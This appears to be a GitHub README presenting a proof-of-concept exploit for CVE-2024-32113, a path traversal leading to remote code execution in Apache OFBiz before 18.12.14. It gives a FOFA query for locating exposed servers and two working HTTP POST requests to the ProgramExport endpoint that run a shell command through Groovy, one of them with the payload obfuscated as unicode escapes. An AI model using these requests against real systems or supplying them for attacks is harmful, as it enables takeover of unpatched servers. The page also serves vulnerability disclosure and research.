CVE-2024-32113

Apache OFBIZ Path traversal leading to RCE EXP.

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.14[not include]. Users are recommended to upgrade to version 18.12.14, which fixes the issue.

fofa query

app="Apache_OFBiz"

POC

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443

groovyProgram=throw+new+Exception('id'.execute().text);

excute id with unicode.

POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1:8443

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

refercence

https://issues.apache.org/jira/browse/OFBIZ-13006
https://xz.aliyun.com/t/14733

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

CVE-2024-32113

fofa query

POC

refercence

Files

README.md

Latest commit

History

README.md

File metadata and controls

CVE-2024-32113

fofa query

POC

refercence